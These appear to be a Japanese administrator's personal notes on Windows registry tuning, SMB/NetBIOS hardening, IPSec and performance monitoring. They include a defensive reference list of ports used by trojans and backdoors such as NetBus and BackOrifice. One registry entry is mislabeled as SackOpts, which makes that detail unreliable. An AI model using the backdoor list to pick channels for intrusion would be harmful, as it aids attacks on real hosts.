TcpTimedWaitDelay = "カスタム セキュリティ: TIME_WAIT 状態で待機する時間を調整"
TcpTimedWaitDelay0 = 240秒(デフォルト)
TcpTimedWaitDelay1 = 10秒
TcpTimedWaitDelay2 = 30秒
TcpTimedWaitDelay3 = 60秒
IPAutoconfigurationEnabled = "カスタム セキュリティ: APIPA を有効にする"
KerberosLog = "特定のコンピュータにログオンしている Kerberos イベントを有効にする"
WriteProtect = "カスタム セキュリティ: USB 外付けストレージへの書き込み禁止する"
■サーバアナウンスメントをさせない(ネットワークコンピュータの中に表示させない)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
値の名前 : Hidden
データ型 : REG_DWORD
値 : 0
1 : [有効] 隠す
[0]: [無効] 隠さない (デフォルト)
コマンドコンソールから net config server /hidden:yes でも 設定可能です。
この後,net config コマンドで "隠しサーバー" が "Yes" になっていることを確認してリブートする。
しかし、このコマンド操作を行うとサーバーサービス のプロパティからの変更処理が効かなくなる
Server サービスの構成および調整
が確認されているのでレジストリを直接操作した方が安全です。
■ファイルやフォルダの最終アクセス時刻の記録
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
値の名前 : NtfsDisableLastAccessUpdate
値の型 : REG_DWORD
値 : 1(登録しない)
■LM ハッシュの作成を無効化する
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\
値の名前 : NoLMHash
データ型 : REG_DWORD
値 : 1
Windows でパスワードの LAN Manger ハッシュが Active Directory とローカル SAM データベースに保存されないようにする方法
http://support.microsoft.com/kb/299656/ja
LanManHash 用 RainbowTable の作成
http://www.insi.co.jp/news/20060529-news.html
Windows認証を数秒で解析脆弱なパスワードは即座に破られる
http://itpro.nikkeibp.co.jp/members/NBY/ITARTICLE/20040601/1/
■パスワード保存機能の無効化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network
値の名前 : DisablePwdCaching
データ型 : REG_DWORD
値 : 0:キャッシュ有効、1:キャッシュ無効
■Serverサービスが利用するメモリー量やネットワーク速度を調整
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
値の名前 : Size
データ型 : REG_DWORD
値 : 1
1:メモリーの使用を最小化する場合
2:バランスを取る場合
3:ネットワーク帯域の使用を最大化する場合
Server の場合は[ローカルエリア接続]の[Microsoftネットワーク用ファイルとプリンタ共有]で設定可能
ちなみに SQL Server をインストールすると、「ネットワーク帯域の使用を最大化する場合」に変わります。
http://msdn2.microsoft.com/ja-jp/library/ms191471.aspx
■シャットダウンの待ち時間を調整
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
値の名前 : WaitToKillServiceTimeout
データ型 : REG_SZ
値 : 20000
■使用できるポートの数を増やす
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : MaxUserPorts
データ型 : REG_DWORD
値 : 5000
■TIME_WAIT 状態で待機する時間の長さを指定
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TcpTimedWaitDelay
データ型 : REG_DWORD
値 : デフォルト 240 秒
■APIPA の利用
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters
値の名前 : IPAutoconfigurationEnabled
データ型 : DWORD
値 : 無効:0、有効:1
http://www.atmarkit.co.jp/fpc/pctips/019disableapipa2k/disableapipa2k.html
■Kerberos イベント ログを有効にする
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters
値の名前 : LogLevel
データ型 : DWORD
値 : 無効:0、有効:1
http://support.microsoft.com/kb/262177/
その他はこの辺りで。
[HOWTO] TCP/IP スタックを強化する方法
http://www.microsoft.com/japan/msdn/security/guidance/secmod109.mspx
グループ ポリシーを使用して、MaxTokenSize レジストリ エントリを複数のコンピューターに追加する方法
http://support.microsoft.com/kb/938118
パフォーマンスモニタを利用してサーバを監視する。(管理ツールの中にあります)
不正アクセス感知として
Server
・Errors Access Permissions
ファイルのオープンが失敗し、STATUS_ACCESS_DENIED が出された回数
・Errors Granted Access
ファイルへのアクセスが拒否された回数
・Errors Logon
ログオンに失敗した回数
Web Service
・Total Copy Requests/Total Delete Requests
サービスが開始されてから数えられた、COPY メソッドを使用した HTTP 要求の数
・Total Head Requests
サービスが開始されてから数えられた、HEAD メソッドを使用した HTTP 要求の数
・Logon Attempts/sec
Logon Attempts/sec は Web サービスを使用してログオンが試行される比率
Active Server Pages
・Request Failed Total
エラー、証明エラー、拒否により失敗した要求の数
・Request Queued
キューからのサービスを待っている要求の数
KB: 300237 [HOW TO] コンピュータ リソースの不足を通知するように Windows 2000 Server を構成する方法
http://support.microsoft.com/kb/300237
マイクロソフトの Securing Windows 2000 Server ソリューション
第 9 章 ‐ 監査と侵入検出
http://www.microsoft.com/japan/technet/security/prodtech/windows2000/secwin2k/09detect.mspx
使いこなすには、正常稼動時のサンプルをベースラインを作成し、そこから警告値を設定しておく。
こなへん
PC の基礎 入出力、プロセッサ、およびメモリ
http://www.microsoft.com/japan/whdc/system/cec/default.mspx
ネットワーク管理運用ガイド
http://www.microsoft.com/japan/technet/prodtechnol/windows2000serv/maintain/opsguide/netadmog.mspx
管理ツールと管理機能を使用する
http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/strategies_and_tools.asp
ハードウェア パフォーマンスの監視とチューニングを行う
http://www.microsoft.com/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/perf_mon_hardware.asp
パフォーマンスの問題を解決する
http://www.microsoft.com/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/datacenter/proddocs/ja-jp/SAG_MPmonperf_28.asp
パフォーマンス データを分析する
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/ja/library/ServerHelp/f317ba77-45f0-44a3-986a-13299572226e.mspx?mfr=true
Windows Server 2003 のパフォーマンス チューニング ガイドライン
http://download.microsoft.com/download/6/6/8/668b964f-f126-4a96-88db-25d842a7113f/tuning.doc
Windows Server 2008 のパフォーマンス チューニングに関するガイドライン
http://www.microsoft.com/japan/whdc/system/sysperf/Perf_tun_srv.mspx
Windows Server 2008 R2 のパフォーマンス チューニングに関するガイドライン
http://www.microsoft.com/japan/whdc/system/sysperf/Perf_tun_srv-R2.mspx
サーバーのパフォーマンスの最適化
http://msdn2.microsoft.com/ja-jp/library/ms188284.aspx
SQL Server 2000 管理者用ポケット コンサルタント 第 10 章 ‐ プロファイリングと監視
http://www.microsoft.com/japan/technet/prodtechnol/sql/2000/books/c10ppcsq.mspx
64 ビット版の Windows Server 2003 または Windows XP の適切なページング ファイル サイズを決定する方法
http://support.microsoft.com/kb/889654/ja
パフォーマンス・モニタの使い方(基本編)
http://www.atmarkit.co.jp/fwin2k/win2ktips/1229perfmon/perfmon.html
メモリリークを引き起こす該当コンポーネントを調査・特定する
サポートツールに含まれる「Memory Pool Monitor(Poolmon)」を利用。
Debugging Tools for Windows に「Pooltag.txt」が含まれているので、これも利用し以下のコマンドを叩く。
POOLMON -g "c:\program files\Debugging Tools for Windows\triage\pooltag.txt" -p -d
※Memory Pool Monitor の出力はコマンドプロンプトのデフォルトでは収まりきらないのでプロパティから
画面バッファサイズとフォントサイズを調整して画面サイズ内に全ての表示が収まるようにする。
確認するのは、「Diff」「Bytes」列の数値。
「Diff」列は「Allocs」列と「Frees」列の差であり、コンポーネントが行なったメモリ割り当てのうち
開放されていない割り当て数を示す。
この数値が時間とともに増加する場合は、そのコンポーネントでメモリリークが発生している可能性がある。
「Bytes」列は、現在割り当てられているメモリ量を示す。
この列の値が時間とともに増加する場合も、そのコンポーネントでメモリリークが発生している可能性を示している。
Memory Pool Monitor (Poolmon.exe) を使用して
カーネル モードのメモリ リークのトラブルシューティングを行う方法
http://support.microsoft.com/kb/177415
メモリのアクセスおよび割り当てのエラーに関するテスト
http://www.microsoft.com/japan/whdc/driver/security/mem-alloc_tst.mspx
Process Explorer
http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx
「Strings」タブは日本語文字コードに対応してませんが、これも役に立つでしょう。
サービス リクエスト
SR シートのダウンロード
Windows XP Service Pack 2 で MSN Messenger を使用しているときに IME (Input Method Editor) を使用できない
http://support.microsoft.com/default.aspx?scid=kb;ja;890831
にパッチが公開されています。
Windows Server 2003 で 「system error ID 1003」が出る場合の対策
以下ページを参考に パッチを手に入れ適応する事で解決するかも。。。
Windows Server 2003 ベースのコンピュータを再起動するとエラー メッセージ "Serious system error" が表示され、イベント ID 1003 が記録される
Outlook Express 6 の [ツール] メニューにある [Windows Messenger] を非表示に設定
レジストリで以下の値を追加
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express
値の名前 : Hide Messenger
データ型 : DWORD
値 : 2
Windows Messenger を無効にすると、Outlook Express で DCOM エラーが発生する場合がある
Windows XP ベースのコンピュータで Windows Messenger が実行されないようにする方法
トロイの木馬でよく使用されるポート
TCP/21 WinCrash, Back Construction
TCP/23 telnet
TCP/25 Ajan, Email Password Sender Happy99
TCP/31 Agent31, Masters Paradise
TCP/41 Deep Throat
TCP/59 DMSetup
TCP/80 Eecuter
TCP/99 Hidden Port
TCP/113 Kiazimas
TCP/119 Happy99
TCP/121 BO jammerkillah
TCP/456 Hackers Paradise
TCP/531 Rasmin
TCP/555 Phase Zero, Stealth Spy
TCP/666 Back Construction, Attack FTP
TCP/911 Dark Shadow
TCP/999 Deep Throat
TCP/1001 Silencer, WebEx
TCP/1010 Doly
TCP/1011 Doly
TCP/1012 Doly
TCP/1015 Doly
TCP/1024 NetSpy
TCP/1033 NetSpy
TCP/1042 Bla
TCP/1047 CateCrasher
TCP/1090 Xtreme
TCP/1170 Streaming Audio Torojan, Psyber Stream Server
TCP/1234 Ultors
TCP/1243 BackDoor-G, SubSeven
TCP/1245 VooDoo Doll
TCP/1269 Maverick's Matrix
TCP/1492 BackOrifice FTP, FTP99
TCP/1509 Psyber Streaming Server
TCP/1600 Shvka Burka
TCP/1807 SpySender
TCP/1981 ShockRave
TCP/1999 Trojan Scout
TCP/2000 Trojan Scout
TCP/2001 Trojan Cow
TCP/2002 Trojan Scout
TCP/2003 Trojan Scout
TCP/2004 Trojan Scout
TCP/2005 Trojan Scout
TCP/2023 Pass Ripper
TCP/2115 Bugs
TCP/2140 Deep Throat
TCP/2155 Illusion Mailer
TCP/2283 HVL Rat5
TCP/2565 Striker
TCP/2583 Wincrash
TCP/2801 Phineas Phucke
UDP/2989 RAT
TCP/3129 Master Paradise
TCP/3150 Deep Throat
TCP/3459 Eclips2000
UDP/3801 Eclips
TCP/4321 BoBo
TCP/4567 FileNail
TCP/4950 ICQ Trojan
TCP/5000 Bubbel, Blazer
TCP/5001 BackDoor Server
TCP/5011 OOTLT
TCP/5031 NetMetro
TCP/5321 Filehotcker
TCP/5400 Blade Runner, Back Construction
TCP/5401 Blade Runner, Back Construction
TCP/5402 Blade Runner, Back Construction
TCP/5512 Illusion Mailer
TCP/5550 Xtcp
TCP/5555 ServeMe
TCP/5556 BO Facil
TCP/5557 BO Facil
TCP/5569 RoboHack
TCP/5714 Wincrash3
TCP/5742 Wincrash
TCP/6400 The Thing
TCP/6669 Vampire
TCP/6670 Deep Throat
TCP/6671 Deep Throat
TCP/6767 NT Remote Control
TCP/6776 SubSeven, BackDoor-G
TCP/6883 DeltaSource
TCP/6912 Shit Heep
TCP/6939 Indoctrination
TCP/6969 GateCrasher
TCP/6970 GateCrasher
TCP/7000 Remote Grab
TCP/7300 NetMonitor
TCP/7301 NetMonitor
TCP/7306 NetMonitor
TCP/7306 NetMonitor
TCP/7307 NetMonitor
TCP/7308 NetMonitor
TCP/7789 ICQ Killer
TCP/8080 RingZero
TCP/9400 InCommand
TCP/9872 Portal Of Doom
TCP/9873 Portal Of Doom
TCP/9874 Portal Of Doom
TCP/9875 Portal Of Doom
TCP/9876 Cyber Attacker
TCP/9878 TransScout
TCP/9989 iNi-Killer
UDP/10067 Portal Of Doom
TCP/10101 BrainSpy
UDP/10167 Portal Of Doom
TCP/11000 Senna Spy Trojan
TCP/11223 Progenic Trojan
TCP/12076 Gjamer
TCP/12223 Hack99 KeyLogger
TCP/12345 NetBus
TCP/12346 NetBus
TCP/12631 WhackJob
TCP/13000 SennaSpy
TCP/16969 Priority
TCP/17300 Kuang2
TCP/20000 Millenium2
TCP/20001 Millenium2
TCP/20034 NetBus2
TCP/20203 Loged
TCP/20331 Bla
TCP/21554 GirlFriend
TCP/22222 Schwindler
TCP/23476 Donald Dick
TCP/23477 Donald Dick
TCP/23456 Whack Job, Evil FTP
UDP/26274 Delta Source
TCP/29891 The Unexplained
UDP/29891 The Unexplained
TCP/30029 AOL Trojan
TCP/30101 NetSphere
TCP/30102 NetSphere
TCP/30100 NetSphere
TCP/30303 Socket23
TCP/30999 Kuang2
TCP/31336 BO Whack
UDP/31337 BackOrifice
UDP/31338 BackOrifice
TCP/31339 NetSpy
TCP/31666 Whackmole
UDP/31789 Hack a tack
UDP/31791 Hack a tack
TCP/32771 Solaris rcpbind vulnerability
TCP/33333 Prosiak
TCP/33911 Trojan Spirit
TCP/34324 TN
TCP/34324 Tiny Telnet Server
TCP/40412 The Spy
TCP/40421 Master Paradise
TCP/40423 Master Paradise
UDP/47262 Delta Source
TCP/50766 Fore
TCP/53001 Remote Shutdown
UDP/54321 Back Orifice 2000
小規模サイト管理者向けセキュリティ対策マニュアル(IPA)
http://www.ipa.go.jp/security/fy12/contents/crack/soho/soho/
Botnet でよく使われるポート
TCP/42 WINS (Host Name Server)
TCP/80 www
TCP/903 NetDevil Backdoor
TCP/1025 Microsoft Remote Procedure Call (RPC) service and Windows Messenger port
TCP/1433 ms-sql-s (Microsoft-SQL-Server)
TCP/2745 backdoor of Bagle worm
TCP/3127 backdoor of MyDoom worm
TCP/3306 MySQL UDF Weakness
TCP/3410 vulnerability in Optix Pro remote access trojan
TCP/5000 upnp(Universal Plug and Play: MS01-059 参照)
TCP/6129 dameware(Dameware Remote Admin)
閉じるべき基本ポート
TCP/135 Microsoft to implement Remote Procedure Call
UDP/137 NetBIOS Name Service
TCP/139 NetBIOS Session Service
TCP/445 Microsoft-DS Service
NetBIOS が使用するポート
UDP/137
UDP/138
TCP/139
SMB が使用するポート
TCP/139
TCP/445
インターネットからアクセス可能なサーバは
「ローカル エリア接続」から 「TCP/IP のプロパティ」を開き
・Microsoft ネットワーク用ファイルとプリンタ共有
・Microsoft ネットワーク用クライアント
を削除して SMB を無効にし、
さらに NetBIOS over TCP/IP を無効にする事。
[マイ コンピュータ] を右クリックし、[管理] を選択。
[システム ツール]>[デバイス マネージャ]>[デバイス マネージャ] を右クリック
[表示]を選択し、[非表示のデバイスの表示]をクリック
[プラグ アンド プレイではないドライバ] を展開し、[NetBios over Tcpip] を右クリック
[無効] をクリック。
※「ローカル エリア接続」の「TCP/IP のプロパティ」にある [WINS] タブに
[NetBIOS over TCP/IP を無効にする] オプションがありまが、このオプションを選択しても
TCP ポート 139 上でリッスンする NetBIOS セッション サービスが無効になるだけです。
SMB が完全に無効になるわけではありません。
詳しくは
マイクロソフトの Securing Windows 2000 Server ソリューション 付録 D ‐ 信頼されていないネットワーク内にあるサーバーでの NetBIOS の無効化
ポートの情報に
PORT NUMBERS
http://isc.sans.org/
インターネット定期観測(@police)
Weekly SOC Report(ISS)
最近やたらと、TCP/5617 へのアクセスが多い気がするんだけど何?
IPSec
IPSec (インターネット プロトコル セキュリティ)
[IP セキュリティ モニタ] スナップインを追加するには
[HOWTO] Windows Server 2003 で IPSec トンネリングを構成する方法
The Cable Guy - 2005年2月 IPsec のフィルタの順序
Windows Server 2003 をセキュリティ保護する
Windows 2000 で IPSec の IP フィルタ一覧を使用する方法
Windows 2000 および Windows XP の IPSec および L2TP の実装
Windows XP での L2TP/IPSec の基本的なトラブルシューティング
IPsec にフィルタに対する既定の除外の指定方法 (Windows 2003)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPSEC
値の名前 : NoDefaultExempt
データ型 : REG_DWORD
値 : 0 〜 3
0: マルチキャスト、ブロードキャスト、RSVP、Kerberos、ISAKMP トラフィックを除外 (2000、XP 既定のフィルタ動作)
1: マルチキャスト、ブロードキャスト、ISAKMP トラフィックを除外
2: RSVP、Kerberos、ISAKMP トラフィックを除外
3: ISAKMP トラフィックを除外 (2003 既定のフィルタ動作)
※ 設定は netsh ipsec dynamic set config ipsecexempt value=<値> で可能
詳しくはリソースキット 導入編2の 274 ページを参照
Windows Server 2003 で、2048 ビット Diffie-Hellman アルゴリズムを使用する
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters
値の名前 : NegotiateDH2048
データ型 : REG_DWORD
値 : 1
詳しくはWindows XP および Windows 2000 用 L2TP/IPSec NAT-T 更新プログラム
その他。
グループポリシーの更新
Windows 2000
コマンドプロンプトで「secedit.exe /refreshpolicy machine_policy」確認は「secmon.exe」
Windows XP/2003
コマンドプロンプトで「gpupdate.exe」確認は「mmc.exe」でIPセキュリティモニタを追加。
NIC に割り当てられた IP アドレス(ゴーストデバイス)を消す方法
このネットワーク アダブタ用に有力された IP アドレス 192.168.0.1 は 別のアダプタ 'xxx PCI Gigabit Controller' に既に割当てられています。
'xxx PCI Gigabit Controller' は物理的にコンピュータにないか動作していないレガシ アダプタであるため、ネットワーク接続フォルダには表示されません。
同じアドレスが割当てられた 2 つのアダプタがアクティブになった場合、どちらか 1 つのアダプタがそのアドレスを使うことになり、システム構成エラーの原因となります。
※ LAN カードが故障し交換した場合など、新しいアダプタに 以前と同じ IP アドレスを振った場合のメッセージ
(1) コマンドプロンプトを起動します。
・[スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。
・cmd.exe と入力して Enter キーを押します。
(2) ゴーストデバイスを含む " 非表示のデバイス " を表示する設定を行います。
・コマンドプロンプトで ' set devmgr_show_nonpresent_devices=1 ' を実行します。
(3) デバイスマネージャを開きます。
・コマンドプロンプトで ' Start DEVMGMT.MSC ' を実行します。
(4) デバイスマネージャで、[ 非表示デバイスの表示 ] を選択します。
(5) ネットワーク アダプタ ツリーに削除したいオンボード NIC がグレー表示されていることをご確認下さい。
(6) 削除したいオンボード NIC を削除します。
詳しくは ネットワーク アダプタに IP アドレスを設定する際のエラー メッセージ
参考
トラブルシューティング "The registry subkey already exists" というメッセージが表示されます。
Windows Server 2003 と Windows XP でネットワーク接続アイコンがなくなる問題をトラブルシュートする方法
Windows Server 2003 で "インターネット プロトコル (TCP/IP)" をリセットする方法
デバイスのプロパティさわりまくったら、速度が出なくなった。
という事でリセット
Windows XP や Windows Server 2003 で TCP/IP のパラメータをリセットするにはコマンドで
netsh interface ip reset <ログファイル名>
広帯域幅ネットワークの使用効率を高める
TCP ウインドウ サイズ(接続中に一度にバッファに格納できる受信データの量 (バイト数))の調整
受信ウィンドウ サイズは次の方法で決定される
1. リモート ホストに最初に送信される接続要求では、受信ウィンドウ サイズが 16 KB (16,384 バイト) と通知されます。
2. 接続が確立されると、受信ウィンドウのサイズは、MSS の倍数値になるように切り上げられます。
3. ウィンドウ サイズは、MSS の 4 倍に調整されます。ウィンドウ スケーリング オプション (RFC 1323) が有効でない限り、最大サイズは 64 KB です。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters (Windows 2003)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces (Windows 2000)
値の名前 : TcpWindowSize
データ型 : REG_DWORD
値 : 0 〜 0x3FFFC000 (16 進数)
※ TcpWindowSize を Parameters キーに追加すると、すべてのインターフェイスのウィンドウ サイズをグローバルに設定することもできる。
この値は、デフォルトでは存在しません。TcpWindowSize 値を追加すると、上で説明したデフォルトのウィンドウ サイズのアルゴリズムより優先されます。
TCPWindowSize の値を変更してもデフォルトの TCP ウィンドウ サイズが使用され続ける
Windows 2000 で TCP 受信ウィンドウのデフォルトのサイズを SP3 以前のデフォルトのサイズ 17,520 バイトに戻すセキュリティ更新プログラム 893066
VISTA は自動調整されるので、無効化する場合は以下のコマンドを実行
(VISTA で見れないサイトがある場合等に)
netsh interface tcp set global autotuninglevel=disabled
戻す場合は
netsh interface tcp set global autotuninglevel=normal
ちなみに autoTuningLevel で利用可能なオプションは
・disabled
・highlyrestricted <Vista 以降はこの設定が速度が出るようです。
・restricted
・normal
・experimental
詳しくは
KB934430 http://support.microsoft.com/kb/934430/
KB929868 http://support.microsoft.com/kb/929868/
KB935400 http://support.microsoft.com/kb/935400/
TCP 受信ウィンドウ自動チューニング
http://www.microsoft.com.nsatc.net/technet/technetmag/issues/2007/01/CableGuy/default.aspx?loc=jp
Windows Vista ベースのコンピュータとそれ以前のオペレーティング システムの間で、サイズの大きいファイルをコピーすると、予想よりもコピー操作に時間がかかることがある
http://support.microsoft.com/kb/932170/
Windows Vista で特定のルーターやマイクロソフト製以外の特定の DHCP サーバーから IP アドレスを取得できない
http://support.microsoft.com/kb/928233/
Copy process is very slow when you copy large files from one computer to another computer in a high-bandwidth network environment if both computers are running either Windows Vista or Windows Sever 2008
http://support.microsoft.com/kb/955427/
TCPの再送処理の挙動が変、TCP受信ウィンドウを広げれない。
RWINを自動で調整するようになった
http://ascii.jp/elem/000/000/106/106192/
【インターネットはこうして創られている〜IETFの仕組み】 第3回:RFCの読み方
http://internet.watch.impress.co.jp/docs/column/ietf2009/20091028_324722.html
(Obsoletes RFCXXXX) RFCXXXXを無効に
(Obsoleted By RFCXXXX) RFCXXXXに置き換え
(Updates RFCXXXX) RFCXXXXに追加して
(Updated By RFCXXXX) RFCXXXXに追加事項
RFC 1323 のタイムスタンプおよびウィンドウ スケーリング オプションを制御
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : Tcp1323Opts
データ型 : REG_DWORD
値 : 0 〜 3
0: RFC 1323 オプション無効
1: ウィンドウ スケール オプションのみ有効
2: タイムスタンプ オプションのみ有効
3: 両方のオプションを有効
※ タイムスタンプとウィンドウ スケーリングはデフォルトで有効になっています。
SACK の使用を制御
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : SackOpts
データ型 : REG_DWORD
値 : 0 または 1 デフォルト値は 1 (有効)
SACK (Selective ACK - RFC 2018) のサポートを有効にするかどうかを制御する。
TCP の再送動作制御(Fast Retransmit の開始に必要な ACK の数を制御)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : SackOpts
データ型 : REG_DWORD
値 : 1 〜 3 デフォルト値は 2
デフォルトでは、同じシーケンス番号の ACK を 3 つ (通常の ACK とさらに 2 つの ACK) 受信し
そのシーケンス番号が現在の番号より古い番号の場合セグメントが再送されます。
Windows 2000 および Windows Server 2003 の TCP 機能について
セキュリティ更新プログラム 893066 は Windows 2000 で TCP 受信ウィンドウの既定のサイズを SP3 以前の既定のサイズ 17,520 バイトに戻す
Next Generation TCP/IP Stack
TCP/IP Registry Values for Microsoft Windows Vista and Windows Server "Longhorn"
Microsoft Windows Server 2003 TCP/IP Implementation Details
Technical Reference to the Windows 2000 Registry Start Page
Microsoft Windows 2000 TCP/IP Implementation Details
修正プログラムが提供されて、ループバック待ち時間の TCP と UDP 遅延または Windows Vista で Windows Server 2008 の向上
Windows XP をファイルサーバとして使う場合のチューニング
Windows XP でシステム キャッシュを構成する
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
値の名前 : LargeSystemCache
データ型 : REG_DWORD
値 : 1(有効)
[ファイル名を指定して実行] をクリックし、sysdm.cpl と入力。
[詳細設定]>[パフォーマンス] >[設定] >[詳細設定] >[メモリ使用量]
・[プログラム]:コンピュータをサーバーではなくワークステーションとして使用する場合
・[システム キャッシュ] :サーバーとして使用する場合 ※上記レジストリが有効になります。
どちらか選択し、再起動する。
Windows XP でシステム キャッシュ モードを有効にする場合の注意事項
DivX のアクティベーションが出来ない場合の上限数の更新方法
1.DivXNetworks社の下記ウェブサイトにアクセス
http://www.divx.com/support/divxpro/request_increase.php
2.「Option 1: Automated Request」項目内のフォーム「Email Address: 」「Serial Number: 」を入力し「Submit」ボタンをクリック
3.下記の通り表示されたら受付完了。
Request DivX Pro Installation Increase
You should receive an email containing your serial number within the next 15 minutes.
If you do not receive an email it could mean that we’re unable to determine that the account does not exist based on the email address and serial number you entered,
if so please go back and use the Manual Request Form (Option 2) to request an increase.
上限数の更新がなされなかった場合は、「Option 2: Manual Request」項目内のフォームに入力し依頼する。
username:password を有効にする。
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\FeatureControl
値の名前 : FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
データ型 : REG_DWORD
値 : 0:無効 1:有効
※ FeatureControl は無いのでキーを作成。
詳しくは
Internet Explorer で HTTP URL と HTTPS URL のユーザー情報を処理する際のデフォルトの動作を変更するセキュリティ更新プログラムの使用について
Office をインストールして、起動時に DCOM ( MDM.EXE ) がエラーを出している場合の対処。
CLSID {0C0A3666-30C9-11D0-8F20-00805F2CD064} の場合は レジストリエディタで検索すると
MDM.EXE (Machine Debug Manager) という事が分かると思うので
1.コマンド プロンプトで「dcomcnfg.exe」を実行して [分散 COM の構成のプロパティ] ダイアログ ボックスを開く。
2.[アプリケーション] タブの DCOM サーバーの一覧で、[Machine Debug Manager] エントリを参照。
エントリが見つからない場合は、コマンド プロンプトで「mdm.exe /regserver」を実行してエントリを追加。
3.起動アクセス許可を与えるユーザーに
Interactive
System
Administrators
IWAM_
が登録されているか確認。
4.[識別] タブの [対話ユーザー]で[次のユーザー] をクリックして Administrators グループに属するユーザーのユーザー名とパスワードを入力。
5.コンピュータを再起動して、変更を有効にする。
参考
[PRB] DCOM サーバーを起動しようとするとアクセスが拒否される
Microsoft Windows Server 2003 Service Pack 1 をインストールすると、DCOM を使用するプログラムが正常に動作しなくなる
CRC エラーやタイムアウトで HDD の転送速度が低下するのを避ける(XP 以降)
IDE/ATAPI ポートドライバの自動転送モード(自動的に転送速度を下げる機能)を停止
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}\0002
値の名前 : EnableUDMA66
データ型 : REG_DWORD
値 : 1(有効)0(無効)
※ このキーは存在しないので作成する必要がある
値の名前 : ResetErrorCountersOnSuccess
データ型 : REG_DWORD
値 : 1(有効:リセットする)、 0(無効:リセットしない)
※ 0001 がプライマリIDE、0002 がセカンダリIDE
タイミングモードの許可
値の名前 : MasterDeviceTimingModeAllowed 又は SlaveDeviceTimingModeAllowed
データ型 : REG_DWORD
値 : 0xffffffff(10進で4294967295)
タイミングモードの指定
値の名前 : MasterDeviceTimingMode 又は SlaveDeviceTimingMode
データ型 : REG_DWORD
値 : 0x12010 (UATA133:UltraDMAモード6)
Ultra ATA/33(UltraDMAモード2) :2010
Ultra ATA/66(UltraDMAモード4) :8010
Ultra ATA/100(UltraDMAモード5):10010
Ultra ATA/133(UltraDMAモード6):12010
※ HDD によっては本来の性能を発揮していない(ATA133 なのに互換性の為 ATA100 で動作する場合も)あるようです。
メーカの HP で公開されているファームを適応すると本来の性能が発揮出来るようになります。
デバイスマネージャを開き、「IDE ATA/ATAPI コントローラ」の セカンダリ,プライマリ IDE チャネルのプロパティから「詳細設定」タブを開けば確認、設定できます。
PIO になっていたら DISK アクセスが低下しています。 高速モードに戻る事は有りませんので手動で変更しましょう。
ATAプロトコル UDMAモード[0〜6],PIOモード[0〜4]
PIO mode 0 3.33MB/s
PIO mode 1 5.22MB/s
PIO mode 2 8.33MB/s
PIO mode 3 11.1MB/s
PIO mode 4 16.6MB/s
Ultra DMA mode 0 16.6MB/s
Ultra DMA mode 1 25.0MB/s
Ultra DMA mode 2 33.3MB/s
Ultra DMA mode 3 44.4MB/s
Ultra DMA mode 4 66.6MB/s
Ultra DMA mode 5 100MB/s
Ultra DMA mode 6 133MB/s
※ Windows 2000 を長く使っている場合は PIO に変わってる可能性が高いです。
Windows XP における DMA と PIO の設定の場所
Windows 2000 はこの辺りの記事参照 http://www.atmarkit.co.jp/fpc/motoazabu/017_2001-06-08/win2ksp2_ata.html
2000 や XP で 137GB 以上の HDD を利用する場合に 48 ビット LBA サポートを正しく機能させる
・コンピュータに 48 ビット LBA 対応の BIOS がインストールされている。
・コンピュータに 137 GB 以上の容量のハード ディスクが搭載されている。
の条件を満たしている場合は
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Atapi\Parameters
値の名前 : EnableBigLba
データ型 : REG_DWORD
値 : 1(有効)0(無効)
※ このキーが存在しない場合は作成する必要がある
詳しくは
大容量ハードディスクの 137 GB を超えた容量が認識されない場合の対処方法
http://support.microsoft.com/kb/882350
Windows 2000 における ATAPI ディスク ドライブへの 48 ビット LBA サポート
http://support.microsoft.com/kb/305098
Windows XP で ATAPI ディスク ドライブに対して 48 ビット論理ブロック アドレス サポートを有効にする方法
http://support.microsoft.com/kb/303013
スタンバイまたは休止状態に入った場合やメモリ ダンプの書き込みでハード ディスク ドライブが破壊される可能性がある
http://support.microsoft.com/kb/331958
137 GB を超える大きさのミラー化されたドライブのパフォーマンスが低下する
http://support.microsoft.com/kb/314695
